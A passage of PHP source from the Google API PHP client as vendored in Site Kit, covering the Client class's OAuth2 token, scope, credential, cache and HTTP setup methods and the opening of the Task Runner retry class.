"google-api-php-client/"; const OAUTH2_REVOKE_URI = 'https://oauth2.googleapis.com/revoke'; const OAUTH2_TOKEN_URI = 'https://oauth2.googleapis.com/token'; const OAUTH2_AUTH_URL = 'https://accounts.google.com/o/oauth2/v2/auth'; const API_BASE_PATH = 'https://www.googleapis.com'; /** * @var ?OAuth2 $auth */ private $auth; /** * @var ClientInterface $http */ private $http; /** * @var ?CacheItemPoolInterface $cache */ private $cache; /** * @var array access token */ private $token; /** * @var array $config */ private $config; /** * @var ?LoggerInterface $logger */ private $logger; /** * @var ?CredentialsLoader $credentials */ private $credentials; /** * @var boolean $deferExecution */ private $deferExecution = \false; /** @var array $scopes */ // Scopes requested by the client protected $requestedScopes = []; /** * Construct the Google Client. * * @param array $config { * An array of required and optional arguments. * * @type string $application_name * The name of your application * @type string $base_path * The base URL for the service. This is only accounted for when calling * {@see Client::authorize()} directly. * @type string $client_id * Your Google Cloud client ID found in https://developers.google.com/console * @type string $client_secret * Your Google Cloud client secret found in https://developers.google.com/console * @type string|array|CredentialsLoader $credentials * Can be a path to JSON credentials or an array representing those * credentials (@see Google\Client::setAuthConfig), or an instance of * {@see CredentialsLoader}. * @type string|array $scopes * {@see Google\Client::setScopes} * @type string $quota_project * Sets X-Goog-User-Project, which specifies a user project to bill * for access charges associated with the request. * @type string $redirect_uri * @type string $state * @type string $developer_key * Simple API access key, also from the API console. Ensure you get * a Server key, and not a Browser key. * **NOTE:** The universe domain is assumed to be "googleapis.com" unless * explicitly set. When setting an API ley directly via this option, there * is no way to verify the universe domain. Be sure to set the * "universe_domain" option if "googleapis.com" is not intended. * @type bool $use_application_default_credentials * For use with Google Cloud Platform * fetch the ApplicationDefaultCredentials, if applicable * {@see https://developers.google.com/identity/protocols/application-default-credentials} * @type string $signing_key * @type string $signing_algorithm * @type string $subject * @type string $hd * @type string $prompt * @type string $openid * @type bool $include_granted_scopes * @type string $login_hint * @type string $request_visible_actions * @type string $access_type * @type string $approval_prompt * @type array $retry * Task Runner retry configuration * {@see \Google\Task\Runner} * @type array $retry_map * @type CacheItemPoolInterface $cache * Cache class implementing {@see CacheItemPoolInterface}. Defaults * to {@see MemoryCacheItemPool}. * @type array $cache_config * Cache config for downstream auth caching. * @type callable $token_callback * Function to be called when an access token is fetched. Follows * the signature `function (string $cacheKey, string $accessToken)`. * @type \Firebase\JWT $jwt * Service class used in {@see Client::verifyIdToken()}. Explicitly * pass this in to avoid setting {@see \Firebase\JWT::$leeway} * @type bool $api_format_v2 * Setting api_format_v2 will return more detailed error messages * from certain APIs. * @type string $universe_domain * Setting the universe domain will change the default rootUrl of the service. * If not set explicitly, the universe domain will be the value provided in the *. "GOOGLE_CLOUD_UNIVERSE_DOMAIN" environment variable, or "googleapis.com". * } */ public function __construct(array $config = []) { $this->config = \array_merge(['application_name' => '', 'base_path' => self::API_BASE_PATH, 'client_id' => '', 'client_secret' => '', 'credentials' => null, 'scopes' => null, 'quota_project' => null, 'redirect_uri' => null, 'state' => null, 'developer_key' => '', 'use_application_default_credentials' => \false, 'signing_key' => null, 'signing_algorithm' => null, 'subject' => null, 'hd' => '', 'prompt' => '', 'openid.realm' => '', 'include_granted_scopes' => null, 'login_hint' => '', 'request_visible_actions' => '', 'access_type' => 'online', 'approval_prompt' => 'auto', 'retry' => [], 'retry_map' => null, 'cache' => null, 'cache_config' => [], 'token_callback' => null, 'jwt' => null, 'api_format_v2' => \false, 'universe_domain' => \getenv('GOOGLE_CLOUD_UNIVERSE_DOMAIN') ?: \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface::DEFAULT_UNIVERSE_DOMAIN], $config); if (!\is_null($this->config['credentials'])) { if ($this->config['credentials'] instanceof \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader) { $this->credentials = $this->config['credentials']; } else { $this->setAuthConfig($this->config['credentials']); } unset($this->config['credentials']); } if (!\is_null($this->config['scopes'])) { $this->setScopes($this->config['scopes']); unset($this->config['scopes']); } // Set a default token callback to update the in-memory access token if (\is_null($this->config['token_callback'])) { $this->config['token_callback'] = function ($cacheKey, $newAccessToken) { $this->setAccessToken([ 'access_token' => $newAccessToken, 'expires_in' => 3600, // Google default 'created' => \time(), ]); }; } if (!\is_null($this->config['cache'])) { $this->setCache($this->config['cache']); unset($this->config['cache']); } } /** * Get a string containing the version of the library. * * @return string */ public function getLibraryVersion() { return self::LIBVER; } /** * For backwards compatibility * alias for fetchAccessTokenWithAuthCode * * @param string $code string code from accounts.google.com * @return array access token * @deprecated */ public function authenticate($code) { return $this->fetchAccessTokenWithAuthCode($code); } /** * Attempt to exchange a code for an valid authentication token. * Helper wrapped around the OAuth 2.0 implementation. * * @param string $code code from accounts.google.com * @param string $codeVerifier the code verifier used for PKCE (if applicable) * @return array access token */ public function fetchAccessTokenWithAuthCode($code, $codeVerifier = null) { if (\strlen($code) == 0) { throw new \InvalidArgumentException("Invalid code"); } $auth = $this->getOAuth2Service(); $auth->setCode($code); $auth->setRedirectUri($this->getRedirectUri()); if ($codeVerifier) { $auth->setCodeVerifier($codeVerifier); } $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($this->getHttpClient()); $creds = $auth->fetchAuthToken($httpHandler); if ($creds && isset($creds['access_token'])) { $creds['created'] = \time(); $this->setAccessToken($creds); } return $creds; } /** * For backwards compatibility * alias for fetchAccessTokenWithAssertion * * @return array access token * @deprecated */ public function refreshTokenWithAssertion() { return $this->fetchAccessTokenWithAssertion(); } /** * Fetches a fresh access token with a given assertion token. * @param ClientInterface $authHttp optional. * @return array access token */ public function fetchAccessTokenWithAssertion(?\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $authHttp = null) { if (!$this->isUsingApplicationDefaultCredentials()) { throw new \DomainException('set the JSON service account credentials using' . ' Google\\Client::setAuthConfig or set the path to your JSON file' . ' with the "GOOGLE_APPLICATION_CREDENTIALS" environment variable' . ' and call Google\\Client::useApplicationDefaultCredentials to' . ' refresh a token with assertion.'); } $this->getLogger()->log('info', 'OAuth2 access token refresh with Signed JWT assertion grants.'); $credentials = $this->createApplicationDefaultCredentials(); $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($authHttp); $creds = $credentials->fetchAuthToken($httpHandler); if ($creds && isset($creds['access_token'])) { $creds['created'] = \time(); $this->setAccessToken($creds); } return $creds; } /** * For backwards compatibility * alias for fetchAccessTokenWithRefreshToken * * @param string $refreshToken * @return array access token */ public function refreshToken($refreshToken) { return $this->fetchAccessTokenWithRefreshToken($refreshToken); } /** * Fetches a fresh OAuth 2.0 access token with the given refresh token. * @param string $refreshToken * @return array access token */ public function fetchAccessTokenWithRefreshToken($refreshToken = null) { if (null === $refreshToken) { if (!isset($this->token['refresh_token'])) { throw new \LogicException('refresh token must be passed in or set as part of setAccessToken'); } $refreshToken = $this->token['refresh_token']; } $this->getLogger()->info('OAuth2 access token refresh'); $auth = $this->getOAuth2Service(); $auth->setRefreshToken($refreshToken); $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($this->getHttpClient()); $creds = $auth->fetchAuthToken($httpHandler); if ($creds && isset($creds['access_token'])) { $creds['created'] = \time(); if (!isset($creds['refresh_token'])) { $creds['refresh_token'] = $refreshToken; } $this->setAccessToken($creds); } return $creds; } /** * Create a URL to obtain user authorization. * The authorization endpoint allows the user to first * authenticate, and then grant/deny the access request. * @param string|array $scope The scope is expressed as an array or list of space-delimited strings. * @param array $queryParams Querystring params to add to the authorization URL. * @return string */ public function createAuthUrl($scope = null, array $queryParams = []) { if (empty($scope)) { $scope = $this->prepareScopes(); } if (\is_array($scope)) { $scope = \implode(' ', $scope); } // only accept one of prompt or approval_prompt $approvalPrompt = $this->config['prompt'] ? null : $this->config['approval_prompt']; // include_granted_scopes should be string "true", string "false", or null $includeGrantedScopes = $this->config['include_granted_scopes'] === null ? null : \var_export($this->config['include_granted_scopes'], \true); $params = \array_filter(['access_type' => $this->config['access_type'], 'approval_prompt' => $approvalPrompt, 'hd' => $this->config['hd'], 'include_granted_scopes' => $includeGrantedScopes, 'login_hint' => $this->config['login_hint'], 'openid.realm' => $this->config['openid.realm'], 'prompt' => $this->config['prompt'], 'redirect_uri' => $this->config['redirect_uri'], 'response_type' => 'code', 'scope' => $scope, 'state' => $this->config['state']]) + $queryParams; // If the list of scopes contains plus.login, add request_visible_actions // to auth URL. $rva = $this->config['request_visible_actions']; if (\strlen($rva) > 0 && \false !== \strpos($scope, 'plus.login')) { $params['request_visible_actions'] = $rva; } $auth = $this->getOAuth2Service(); return (string) $auth->buildFullAuthorizationUri($params); } /** * Adds auth listeners to the HTTP client based on the credentials * set in the Google API Client object * * @param ClientInterface $http the http client object. * @return ClientInterface the http client object */ public function authorize(?\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http = null) { $http = $http ?: $this->getHttpClient(); $authHandler = $this->getAuthHandler(); // These conditionals represent the decision tree for authentication // 1. Check if a Google\Auth\CredentialsLoader instance has been supplied via the "credentials" option // 2. Check for Application Default Credentials // 3a. Check for an Access Token // 3b. If access token exists but is expired, try to refresh it // 4. Check for API Key if ($this->credentials) { $this->checkUniverseDomain($this->credentials); return $authHandler->attachCredentials($http, $this->credentials, $this->config['token_callback']); } if ($this->isUsingApplicationDefaultCredentials()) { $credentials = $this->createApplicationDefaultCredentials(); $this->checkUniverseDomain($credentials); return $authHandler->attachCredentialsCache($http, $credentials, $this->config['token_callback']); } if ($token = $this->getAccessToken()) { $scopes = $this->prepareScopes(); // add refresh subscriber to request a new token if (isset($token['refresh_token']) && $this->isAccessTokenExpired()) { $credentials = $this->createUserRefreshCredentials($scopes, $token['refresh_token']); $this->checkUniverseDomain($credentials); return $authHandler->attachCredentials($http, $credentials, $this->config['token_callback']); } return $authHandler->attachToken($http, $token, (array) $scopes); } if ($key = $this->config['developer_key']) { return $authHandler->attachKey($http, $key); } return $http; } /** * Set the configuration to use application default credentials for * authentication * * @see https://developers.google.com/identity/protocols/application-default-credentials * @param boolean $useAppCreds */ public function useApplicationDefaultCredentials($useAppCreds = \true) { $this->config['use_application_default_credentials'] = $useAppCreds; } /** * To prevent useApplicationDefaultCredentials from inappropriately being * called in a conditional * * @see https://developers.google.com/identity/protocols/application-default-credentials */ public function isUsingApplicationDefaultCredentials() { return $this->config['use_application_default_credentials']; } /** * Set the access token used for requests. * * Note that at the time requests are sent, tokens are cached. A token will be * cached for each combination of service and authentication scopes. If a * cache pool is not provided, creating a new instance of the client will * allow modification of access tokens. If a persistent cache pool is * provided, in order to change the access token, you must clear the cached * token by calling `$client->getCache()->clear()`. (Use caution in this case, * as calling `clear()` will remove all cache items, including any items not * related to Google API PHP Client.) * * **NOTE:** The universe domain is assumed to be "googleapis.com" unless * explicitly set. When setting an access token directly via this method, there * is no way to verify the universe domain. Be sure to set the "universe_domain" * option if "googleapis.com" is not intended. * * @param string|array $token * @throws InvalidArgumentException */ public function setAccessToken($token) { if (\is_string($token)) { if ($json = \json_decode($token, \true)) { $token = $json; } else { // assume $token is just the token string $token = ['access_token' => $token]; } } if ($token == null) { throw new \InvalidArgumentException('invalid json token'); } if (!isset($token['access_token'])) { throw new \InvalidArgumentException("Invalid token format"); } $this->token = $token; } public function getAccessToken() { return $this->token; } /** * @return string|null */ public function getRefreshToken() { if (isset($this->token['refresh_token'])) { return $this->token['refresh_token']; } return null; } /** * Returns if the access_token is expired. * @return bool Returns True if the access_token is expired. */ public function isAccessTokenExpired() { if (!$this->token) { return \true; } $created = 0; if (isset($this->token['created'])) { $created = $this->token['created']; } elseif (isset($this->token['id_token'])) { // check the ID token for "iat" // signature verification is not required here, as we are just // using this for convenience to save a round trip request // to the Google API server $idToken = $this->token['id_token']; if (\substr_count($idToken, '.') == 2) { $parts = \explode('.', $idToken); $payload = \json_decode(\base64_decode($parts[1]), \true); if ($payload && isset($payload['iat'])) { $created = $payload['iat']; } } } if (!isset($this->token['expires_in'])) { // if the token does not have an "expires_in", then it's considered expired return \true; } // If the token is set to expire in the next 30 seconds. return $created + ($this->token['expires_in'] - 30) < \time(); } /** * @deprecated See UPGRADING.md for more information */ public function getAuth() { throw new \BadMethodCallException('This function no longer exists. See UPGRADING.md for more information'); } /** * @deprecated See UPGRADING.md for more information */ public function setAuth($auth) { throw new \BadMethodCallException('This function no longer exists. See UPGRADING.md for more information'); } /** * Set the OAuth 2.0 Client ID. * @param string $clientId */ public function setClientId($clientId) { $this->config['client_id'] = $clientId; } public function getClientId() { return $this->config['client_id']; } /** * Set the OAuth 2.0 Client Secret. * @param string $clientSecret */ public function setClientSecret($clientSecret) { $this->config['client_secret'] = $clientSecret; } public function getClientSecret() { return $this->config['client_secret']; } /** * Set the OAuth 2.0 Redirect URI. * @param string $redirectUri */ public function setRedirectUri($redirectUri) { $this->config['redirect_uri'] = $redirectUri; } public function getRedirectUri() { return $this->config['redirect_uri']; } /** * Set OAuth 2.0 "state" parameter to achieve per-request customization. * @see http://tools.ietf.org/html/draft-ietf-oauth-v2-22#section-3.1.2.2 * @param string $state */ public function setState($state) { $this->config['state'] = $state; } /** * @param string $accessType Possible values for access_type include: * {@code "offline"} to request offline access from the user. * {@code "online"} to request online access from the user. */ public function setAccessType($accessType) { $this->config['access_type'] = $accessType; } /** * @param string $approvalPrompt Possible values for approval_prompt include: * {@code "force"} to force the approval UI to appear. * {@code "auto"} to request auto-approval when possible. (This is the default value) */ public function setApprovalPrompt($approvalPrompt) { $this->config['approval_prompt'] = $approvalPrompt; } /** * Set the login hint, email address or sub id. * @param string $loginHint */ public function setLoginHint($loginHint) { $this->config['login_hint'] = $loginHint; } /** * Set the application name, this is included in the User-Agent HTTP header. * @param string $applicationName */ public function setApplicationName($applicationName) { $this->config['application_name'] = $applicationName; } /** * If 'plus.login' is included in the list of requested scopes, you can use * this method to define types of app activities that your app will write. * You can find a list of available types here: * @link https://developers.google.com/+/api/moment-types * * @param array $requestVisibleActions Array of app activity types */ public function setRequestVisibleActions($requestVisibleActions) { if (\is_array($requestVisibleActions)) { $requestVisibleActions = \implode(" ", $requestVisibleActions); } $this->config['request_visible_actions'] = $requestVisibleActions; } /** * Set the developer key to use, these are obtained through the API Console. * @see http://code.google.com/apis/console-help/#generatingdevkeys * @param string $developerKey */ public function setDeveloperKey($developerKey) { $this->config['developer_key'] = $developerKey; } /** * Set the hd (hosted domain) parameter streamlines the login process for * Google Apps hosted accounts. By including the domain of the user, you * restrict sign-in to accounts at that domain. * @param string $hd the domain to use. */ public function setHostedDomain($hd) { $this->config['hd'] = $hd; } /** * Set the prompt hint. Valid values are none, consent and select_account. * If no value is specified and the user has not previously authorized * access, then the user is shown a consent screen. * @param string $prompt * {@code "none"} Do not display any authentication or consent screens. Must not be specified with other values. * {@code "consent"} Prompt the user for consent. * {@code "select_account"} Prompt the user to select an account. */ public function setPrompt($prompt) { $this->config['prompt'] = $prompt; } /** * openid.realm is a parameter from the OpenID 2.0 protocol, not from OAuth * 2.0. It is used in OpenID 2.0 requests to signify the URL-space for which * an authentication request is valid. * @param string $realm the URL-space to use. */ public function setOpenidRealm($realm) { $this->config['openid.realm'] = $realm; } /** * If this is provided with the value true, and the authorization request is * granted, the authorization will include any previous authorizations * granted to this user/application combination for other scopes. * @param bool $include the URL-space to use. */ public function setIncludeGrantedScopes($include) { $this->config['include_granted_scopes'] = $include; } /** * sets function to be called when an access token is fetched * @param callable $tokenCallback - function ($cacheKey, $accessToken) */ public function setTokenCallback(callable $tokenCallback) { $this->config['token_callback'] = $tokenCallback; } /** * Revoke an OAuth2 access token or refresh token. This method will revoke the current access * token, if a token isn't provided. * * @param string|array|null $token The token (access token or a refresh token) that should be revoked. * @return boolean Returns True if the revocation was successful, otherwise False. */ public function revokeToken($token = null) { $tokenRevoker = new \Google\Site_Kit_Dependencies\Google\AccessToken\Revoke($this->getHttpClient()); return $tokenRevoker->revokeToken($token ?: $this->getAccessToken()); } /** * Verify an id_token. This method will verify the current id_token, if one * isn't provided. * * @throws LogicException If no token was provided and no token was set using `setAccessToken`. * @throws UnexpectedValueException If the token is not a valid JWT. * @param string|null $idToken The token (id_token) that should be verified. * @return array|false Returns the token payload as an array if the verification was * successful, false otherwise. */ public function verifyIdToken($idToken = null) { $tokenVerifier = new \Google\Site_Kit_Dependencies\Google\AccessToken\Verify($this->getHttpClient(), $this->getCache(), $this->config['jwt']); if (null === $idToken) { $token = $this->getAccessToken(); if (!isset($token['id_token'])) { throw new \LogicException('id_token must be passed in or set as part of setAccessToken'); } $idToken = $token['id_token']; } return $tokenVerifier->verifyIdToken($idToken, $this->getClientId()); } /** * Set the scopes to be requested. Must be called before createAuthUrl(). * Will remove any previously configured scopes. * @param string|array $scope_or_scopes, ie: * array( * 'https://www.googleapis.com/auth/plus.login', * 'https://www.googleapis.com/auth/moderator' * ); */ public function setScopes($scope_or_scopes) { $this->requestedScopes = []; $this->addScope($scope_or_scopes); } /** * This functions adds a scope to be requested as part of the OAuth2.0 flow. * Will append any scopes not previously requested to the scope parameter. * A single string will be treated as a scope to request. An array of strings * will each be appended. * @param string|string[] $scope_or_scopes e.g. "profile" */ public function addScope($scope_or_scopes) { if (\is_string($scope_or_scopes) && !\in_array($scope_or_scopes, $this->requestedScopes)) { $this->requestedScopes[] = $scope_or_scopes; } elseif (\is_array($scope_or_scopes)) { foreach ($scope_or_scopes as $scope) { $this->addScope($scope); } } } /** * Returns the list of scopes requested by the client * @return array the list of scopes * */ public function getScopes() { return $this->requestedScopes; } /** * @return string|null * @visible For Testing */ public function prepareScopes() { if (empty($this->requestedScopes)) { return null; } return \implode(' ', $this->requestedScopes); } /** * Helper method to execute deferred HTTP requests. * * @template T * @param RequestInterface $request * @param class-string<T>|false|null $expectedClass * @throws \Google\Exception * @return mixed|T|ResponseInterface */ public function execute(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, $expectedClass = null) { $request = $request->withHeader('User-Agent', \sprintf('%s %s%s', $this->config['application_name'], self::USER_AGENT_SUFFIX, $this->getLibraryVersion()))->withHeader('x-goog-api-client', \sprintf('gl-php/%s gdcl/%s', \phpversion(), $this->getLibraryVersion())); if ($this->config['api_format_v2']) { $request = $request->withHeader('X-GOOG-API-FORMAT-VERSION', '2'); } // call the authorize method // this is where most of the grunt work is done $http = $this->authorize(); return \Google\Site_Kit_Dependencies\Google\Http\REST::execute($http, $request, $expectedClass, $this->config['retry'], $this->config['retry_map']); } /** * Declare whether batch calls should be used. This may increase throughput * by making multiple requests in one connection. * * @param boolean $useBatch True if the batch support should * be enabled. Defaults to False. */ public function setUseBatch($useBatch) { // This is actually an alias for setDefer. $this->setDefer($useBatch); } /** * Are we running in Google AppEngine? * return bool */ public function isAppEngine() { return isset($_SERVER['SERVER_SOFTWARE']) && \strpos($_SERVER['SERVER_SOFTWARE'], 'Google App Engine') !== \false; } public function setConfig($name, $value) { $this->config[$name] = $value; } public function getConfig($name, $default = null) { return isset($this->config[$name]) ? $this->config[$name] : $default; } /** * For backwards compatibility * alias for setAuthConfig * * @param string $file the configuration file * @throws \Google\Exception * @deprecated */ public function setAuthConfigFile($file) { $this->setAuthConfig($file); } /** * Set the auth config from new or deprecated JSON config. * This structure should match the file downloaded from * the "Download JSON" button on in the Google Developer * Console. * @param string|array $config the configuration json * @throws \Google\Exception */ public function setAuthConfig($config) { if (\is_string($config)) { if (!\file_exists($config)) { throw new \InvalidArgumentException(\sprintf('file "%s" does not exist', $config)); } $json = \file_get_contents($config); if (!($config = \json_decode($json, \true))) { throw new \LogicException('invalid json for auth config'); } } $key = isset($config['installed']) ? 'installed' : 'web'; if (isset($config['type']) && $config['type'] == 'service_account') { // application default credentials $this->useApplicationDefaultCredentials(); // set the information from the config $this->setClientId($config['client_id']); $this->config['client_email'] = $config['client_email']; $this->config['signing_key'] = $config['private_key']; $this->config['signing_algorithm'] = 'HS256'; } elseif (isset($config[$key])) { // old-style $this->setClientId($config[$key]['client_id']); $this->setClientSecret($config[$key]['client_secret']); if (isset($config[$key]['redirect_uris'])) { $this->setRedirectUri($config[$key]['redirect_uris'][0]); } } else { // new-style $this->setClientId($config['client_id']); $this->setClientSecret($config['client_secret']); if (isset($config['redirect_uris'])) { $this->setRedirectUri($config['redirect_uris'][0]); } } } /** * Use when the service account has been delegated domain wide access. * * @param string $subject an email address account to impersonate */ public function setSubject($subject) { $this->config['subject'] = $subject; } /** * Declare whether making API calls should make the call immediately, or * return a request which can be called with ->execute(); * * @param boolean $defer True if calls should not be executed right away. */ public function setDefer($defer) { $this->deferExecution = $defer; } /** * Whether or not to return raw requests * @return boolean */ public function shouldDefer() { return $this->deferExecution; } /** * @return OAuth2 implementation */ public function getOAuth2Service() { if (!isset($this->auth)) { $this->auth = $this->createOAuth2Service(); } return $this->auth; } /** * create a default google auth object */ protected function createOAuth2Service() { $auth = new \Google\Site_Kit_Dependencies\Google\Auth\OAuth2(['clientId' => $this->getClientId(), 'clientSecret' => $this->getClientSecret(), 'authorizationUri' => self::OAUTH2_AUTH_URL, 'tokenCredentialUri' => self::OAUTH2_TOKEN_URI, 'redirectUri' => $this->getRedirectUri(), 'issuer' => $this->config['client_id'], 'signingKey' => $this->config['signing_key'], 'signingAlgorithm' => $this->config['signing_algorithm']]); return $auth; } /** * Set the Cache object * @param CacheItemPoolInterface $cache */ public function setCache(\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache) { $this->cache = $cache; } /** * @return CacheItemPoolInterface */ public function getCache() { if (!$this->cache) { $this->cache = $this->createDefaultCache(); } return $this->cache; } /** * @param array $cacheConfig */ public function setCacheConfig(array $cacheConfig) { $this->config['cache_config'] = $cacheConfig; } /** * Set the Logger object * @param LoggerInterface $logger */ public function setLogger(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger) { $this->logger = $logger; } /** * @return LoggerInterface */ public function getLogger() { if (!isset($this->logger)) { $this->logger = $this->createDefaultLogger(); } return $this->logger; } protected function createDefaultLogger() { $logger = new \Google\Site_Kit_Dependencies\Monolog\Logger('google-api-php-client'); if ($this->isAppEngine()) { $handler = new \Google\Site_Kit_Dependencies\Monolog\Handler\SyslogHandler('app', \LOG_USER, \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE); } else { $handler = new \Google\Site_Kit_Dependencies\Monolog\Handler\StreamHandler('php://stderr', \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE); } $logger->pushHandler($handler); return $logger; } protected function createDefaultCache() { return new \Google\Site_Kit_Dependencies\Google\Auth\Cache\MemoryCacheItemPool(); } /** * Set the Http Client object * @param ClientInterface $http */ public function setHttpClient(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http) { $this->http = $http; } /** * @return ClientInterface */ public function getHttpClient() { if (null === $this->http) { $this->http = $this->createDefaultHttpClient(); } return $this->http; } /** * Set the API format version. * * `true` will use V2, which may return more useful error messages. * * @param bool $value */ public function setApiFormatV2($value) { $this->config['api_format_v2'] = (bool) $value; } protected function createDefaultHttpClient() { $guzzleVersion = null; if (\defined('\\Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientInterface::MAJOR_VERSION')) { $guzzleVersion = \Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface::MAJOR_VERSION; } elseif (\defined('\\Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientInterface::VERSION')) { $guzzleVersion = (int) \substr(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface::VERSION, 0, 1); } if (5 === $guzzleVersion) { $options = ['base_url' => $this->config['base_path'], 'defaults' => ['exceptions' => \false]]; if ($this->isAppEngine()) { if (\class_exists(\Google\Site_Kit_Dependencies\GuzzleHttp\Ring\Client\StreamHandler::class)) { // set StreamHandler on AppEngine by default $options['handler'] = new \Google\Site_Kit_Dependencies\GuzzleHttp\Ring\Client\StreamHandler(); $options['defaults']['verify'] = '/etc/ca-certificates.crt'; } } } elseif (6 === $guzzleVersion || 7 === $guzzleVersion) { // guzzle 6 or 7 $options = ['base_uri' => $this->config['base_path'], 'http_errors' => \false]; } else { throw new \LogicException('Could not find supported version of Guzzle.'); } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Client($options); } /** * @return FetchAuthTokenCache */ private function createApplicationDefaultCredentials() { $scopes = $this->prepareScopes(); $sub = $this->config['subject']; $signingKey = $this->config['signing_key']; // create credentials using values supplied in setAuthConfig if ($signingKey) { $serviceAccountCredentials = ['client_id' => $this->config['client_id'], 'client_email' => $this->config['client_email'], 'private_key' => $signingKey, 'type' => 'service_account', 'quota_project_id' => $this->config['quota_project']]; $credentials = \Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader::makeCredentials($scopes, $serviceAccountCredentials); } else { // When $sub is provided, we cannot pass cache classes to ::getCredentials // because FetchAuthTokenCache::setSub does not exist. // The result is when $sub is provided, calls to ::onGce are not cached. $credentials = \Google\Site_Kit_Dependencies\Google\Auth\ApplicationDefaultCredentials::getCredentials($scopes, null, $sub ? null : $this->config['cache_config'], $sub ? null : $this->getCache(), $this->config['quota_project']); } // for service account domain-wide authority (impersonating a user) // @see https://developers.google.com/identity/protocols/OAuth2ServiceAccount if ($sub) { if (!$credentials instanceof \Google\Site_Kit_Dependencies\Google\Auth\Credentials\ServiceAccountCredentials) { throw new \DomainException('domain-wide authority requires service account credentials'); } $credentials->setSub($sub); } // If we are not using FetchAuthTokenCache yet, create it now if (!$credentials instanceof \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache) { $credentials = new \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache($credentials, $this->config['cache_config'], $this->getCache()); } return $credentials; } protected function getAuthHandler() { // Be very careful using the cache, as the underlying auth library's cache // implementation is naive, and the cache keys do not account for user // sessions. // // @see https://github.com/google/google-api-php-client/issues/821 return \Google\Site_Kit_Dependencies\Google\AuthHandler\AuthHandlerFactory::build($this->getCache(), $this->config['cache_config']); } private function createUserRefreshCredentials($scope, $refreshToken) { $creds = \array_filter(['client_id' => $this->getClientId(), 'client_secret' => $this->getClientSecret(), 'refresh_token' => $refreshToken]); return new \Google\Site_Kit_Dependencies\Google\Auth\Credentials\UserRefreshCredentials($scope, $creds); } private function checkUniverseDomain($credentials) { $credentialsUniverse = $credentials instanceof \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface ? $credentials->getUniverseDomain() : \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface::DEFAULT_UNIVERSE_DOMAIN; if ($credentialsUniverse !== $this->getUniverseDomain()) { throw new \DomainException(\sprintf('The configured universe domain (%s) does not match the credential universe domain (%s)', $this->getUniverseDomain(), $credentialsUniverse)); } } public function getUniverseDomain() { return $this->config['universe_domain']; } } <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Task; use Google\Site_Kit_Dependencies\Google\Service\Exception as GoogleServiceException; use Google\Site_Kit_Dependencies\Google\Task\Exception as GoogleTaskException; /** * A task runner with exponential backoff support. * * @see https://developers.google.com/drive/web/handle-errors#implementing_exponential_backoff */ class Runner { const TASK_RETRY_NEVER = 0; const TASK_RETRY_ONCE = 1; const TASK_RETRY_ALWAYS = -1; /** * @var integer $maxDelay The max time (in seconds) to wait before a retry. */ private $maxDelay = 60; /** * @var integer $delay The previous delay from which the next is calculated. */ private $delay = 1; /** * @var integer $factor The base number for the exponential back off. */ private $factor = 2; /** * @var float $jitter A random number between -$jitter and $jitter will be * added to $factor on each iteration to allow for a better distribution of * retries. */ private $jitter = 0.5; /** * @var integer $attempts The number of attempts that have been tried so far. */ private $attempts = 0; /** * @var integer $maxAttempts The max number of attempts allowed. */ private $maxAttempts = 1; /** * @var callable $action The task to run and possibly retry. */ private $action; /** * @var array $arguments The task arguments. */ private $arguments; /** * @var array $retryMap Map of errors with retry counts. */ protected $retryMap = [ '500' => self::TASK_RETRY_ALWAYS, '503' => self::TASK_RETRY_ALWAYS, 'rateLimitExceeded' => self::TASK_RETRY_ALWAYS, 'userRateLimitExceeded' => self::TASK_RETRY_ALWAYS, 6 => self::TASK_RETRY_ALWAYS, // CURLE_COULDNT_RESOLVE_HOST 7 => self::TASK_RETRY_ALWAYS, // CURLE_COULDNT_CONNECT 28 => self::TASK_RETRY_ALWAYS, // CURLE_OPERATION_TIMEOUTED 35 => self::TASK_RETRY_ALWAYS, // CURLE_SSL_CONNECT_ERROR 52 => self::TASK_RETRY_ALWAYS, // CURLE_GOT_NOTHING 'lighthouseError' => self::TASK_RETRY_NEVER, ]; /** * Creates a new task runner with exponential backoff support. * * @param array $config The task runner config * @param string $name The name of the current task (used for logging) * @param callable $action The task to run and possibly retry * @param array $arguments The task arguments * @throws \Google\Task\Exception when misconfigured */ // @phpstan-ignore-next-line public function __construct($config, $name, $action, array $arguments = []) { if (isset($config['initial_delay'])) { if ($config['initial_delay'] < 0) { throw new \Google\Site_Kit_Dependencies\Google\Task\Exception('Task configuration `initial_delay` must not be negative.'); } $this->delay = $config['initial_delay']; } if (isset($config['max_delay'])) { if ($config['max_delay'] <= 0) { throw new \Google\Site_Kit_Dependencies\Google\Task\Exception('Task configuration `max_delay` must be greater than 0.'); } $this->maxDelay = $config['max_delay']; } if (isset($config['factor'])) { if ($config['factor'] <= 0) { throw new \Google\Site_Kit_Dependencies\Google\Task\Exception('Task configuration `factor` 